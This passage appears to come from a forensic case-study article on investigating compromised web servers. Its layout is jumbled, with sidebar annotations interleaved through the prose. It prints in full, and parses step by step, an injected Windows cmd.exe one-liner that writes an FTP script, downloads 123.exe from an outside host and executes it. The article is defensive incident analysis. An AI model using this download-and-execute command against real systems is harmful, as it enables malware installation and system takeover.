In this case, the attacker was able to upload and execute
the PDF file named in the command. One simple tool
that we employed was the Sam Spade safe browser, which
allows the user to visualize a Web page’s Hypertext Markup
Language (HTML) code without actually rendering the
page ( www.samspade.org). We found not a PDF file, but an
HTML page that allows an attacker to design an exploit
code.
& Concatenate the next item to this command
cmd.exe /c del i&echo open 192.0.2.68 5685 >
i&echo user l l >> i&echo get 123.exe >> i
&echo quit >> i &ftp -n -s:i & 123.exe&del
i&exit
echo open 192.0.2.68 5685 > i
Send the line open 192.0.2.68 5685 to the
file i
& Concatenate the next item to this command
Subsequent examination showed that this access came
from a host on an ISP in New York City. The contnou.
sapte.ro host—ostensibly in the Romania (.ro) domain—resolved to an IP address within a block allocated
to another New York City ISP.
& Concatenate the next item to this command
echo get 123.exe >> i
Append the line get 123.exe to file i
Case Study #4: One Hole is All an Exploit Needs
One common vulnerability of software is susceptibility
to so-called buffer overflows, where a nefarious user can
enter more information than the software is expecting,
causing unexpected results. Properly written software will
detect and ignore accidental or purposeful buffer overflow
attempts, but many such vulnerabilities remain. Some
buffer overflow exploits allow a nefarious user to send a set
of instructions to a server; a Bad Guy will use this vulnerability to install a rootkit, allowing the attacker to return
later and own the system. Other variants of this theme are
those vulnerabilities that will allow an attacker to force an
application to execute a single command of the attacker’s
choosing.
& Concatenate the next item to this command
echo quit >> i
Append the line quit to file i
& Concatenate the next item to this command
ftp -n -s:i
Run FTP using file i as the command source
(s:i)
& Concatenate the next item to this command
123.exe Execute the file 123.exe
In late 2006, the authors investigated a hacked Web
site at a small business running Windows 2003 Server.
The systems administrator had noticed unusual log entries
and then found that his system was running a number of
unknown applications.
& Concatenate the next item to this com-
mand
del i Delete file i
& Concatenate the next item to this com-
mand
exit Exit this script
One item that the sysadmin found was this entry in the
recent Run command list (Figure 3):
Simply stated, this single command created a file in the
system32 directory named i with the following contents:
open 192.0.2.68 5685
user l l
get 123.exe
quit
This line was inserted by exploiting a vulnerability in
one of the server’s applications
that allowed an attacker to inject
just one command. But this par-
ticular command is a compound
command that started up the DOS
command interpreter, built an
FTP script, used FTP to run the
script and download an attack
tool, and then executed the attack
tool. A detailed parsing of the injected command is below:
cmd.exe Run the DOS command interpreter
/c Interpret the string that follows this switch
as the command line
del i Delete the file named “i”
The file is a command script for FTP. First, a connec-
tion is made to port 5685 on host 192.0.2.68, which is
presumably a hidden FTP daemon. The command accesses
the FTP server with a username of 1 and a password of 1,
downloads a file named 123.exe, and then exits the FTP
server. The IP address that was actually employed resolved
back to a Bell Canada DSL customer in the area of Lon-
don, Ontario.
This command was found in the Registry key HKCU\
The nefarious command then executes 123, deletes the
file i, and exits the script. We found the file i, however,
because once control was transferred to 123.exe, this script
was never completed. (Even if it had been deleted, it would
have been discoverable with a computer forensics tool
since it would have been deleted and not wiped.)